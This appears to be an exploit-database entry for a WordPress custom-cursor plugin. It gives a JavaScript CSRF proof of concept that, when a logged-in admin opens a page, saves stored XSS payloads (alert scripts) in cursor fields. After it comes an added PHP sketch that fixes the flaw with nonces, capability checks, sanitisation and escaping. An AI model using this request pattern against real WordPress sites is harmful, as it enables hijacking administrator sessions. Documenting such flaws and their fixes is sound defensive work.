## https://sploitus.com/exploit?id=WPEX-ID:4C13A93D-2100-4721-8937-A1205378655F
Make a logged-in admin open a page containing the JS code below:

```js
// To add a cursor with XSS payloads in it:
fetch("https://example.com/wp-admin/admin.php?page=wpcc_add_new", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'cursor_shape=1&cursor_type=text&cursor_image=&click_point=50%2C50&cursor_text=<script>alert(/XSS-text/)>&color=<script>alert(/XSS-color/)>&width=30&blending_mode=normal&hide_tablet=on&hide_mobile=on&hover_cursor_type=1&hover_cursors=&activate_on=0&selector_type=tag&selector_data=&submit=Save+Cursor',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

// To edit the cursor with ID 1 and set XSS payloads in it:
fetch("https://example.com/wp-admin/admin.php?page=wpcc_add_new&edit_row=1", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'cursor_shape=1&cursor_type=text&cursor_image=&click_point=50%2C50&cursor_text=<script>alert(/XSS-text/)>&color=<script>alert(/XSS-color/)>&width=30&blending_mode=normal&hide_tablet=on&hide_mobile=on&hover_cursor_type=1&hover_cursors=&activate_on=0&selector_type=tag&selector_data=&update_id=1&update=Update+Cursor',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

The XSS is triggered when viewing the cursor list, as well as when editing the cursor.
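
The requests above carry no nonce field, and the `cursor_text` and `color` values come back as markup in the admin pages. The sketch below is an added example of the corresponding server-side hardening using standard WordPress functions; it is not the plugin's own code. The function names, the nonce action `wpcc_save_cursor`, the `_wpcc_nonce` field, the `manage_options` capability and the hex color format are assumptions; the POST field names are taken from the requests above.

```php
<?php
// Added example, not the plugin's code. Function names, nonce action/field,
// required capability and the hex color format are assumptions.

// 1. Emit a per-user, per-action token inside the admin "add/edit cursor" form.
function wpcc_example_render_nonce() {
    wp_nonce_field( 'wpcc_save_cursor', '_wpcc_nonce' );
}

// 2. Accept a save only from an authorised user who also sent a valid token.
function wpcc_example_handle_save() {
    if ( ! isset( $_POST['submit'] ) && ! isset( $_POST['update'] ) ) {
        return null; // Not a save request.
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Forbidden', '', array( 'response' => 403 ) );
    }
    // Terminates the request when the nonce is missing or invalid. A page on
    // another origin cannot read the token, so a cross-site fetch() fails here
    // even though the admin's cookies are attached.
    check_admin_referer( 'wpcc_save_cursor', '_wpcc_nonce' );

    // Validate on input: plain text, a hex color, a non-negative integer.
    $text  = sanitize_text_field( wp_unslash( $_POST['cursor_text'] ?? '' ) );
    $color = sanitize_hex_color( wp_unslash( $_POST['color'] ?? '' ) );
    $width = absint( $_POST['width'] ?? 0 );

    return array(
        'cursor_text' => $text,
        'color'       => $color ? $color : '', // null when not #rgb / #rrggbb
        'width'       => $width,
    );
}

// 3. Escape on output as well, so rows stored before the fix render inertly
//    in the cursor list and the edit screen.
function wpcc_example_render_row( array $cursor ) {
    printf(
        '<tr><td style="color:%s">%s</td><td>%d</td></tr>',
        esc_attr( $cursor['color'] ),
        esc_html( $cursor['cursor_text'] ),
        (int) $cursor['width']
    );
}
```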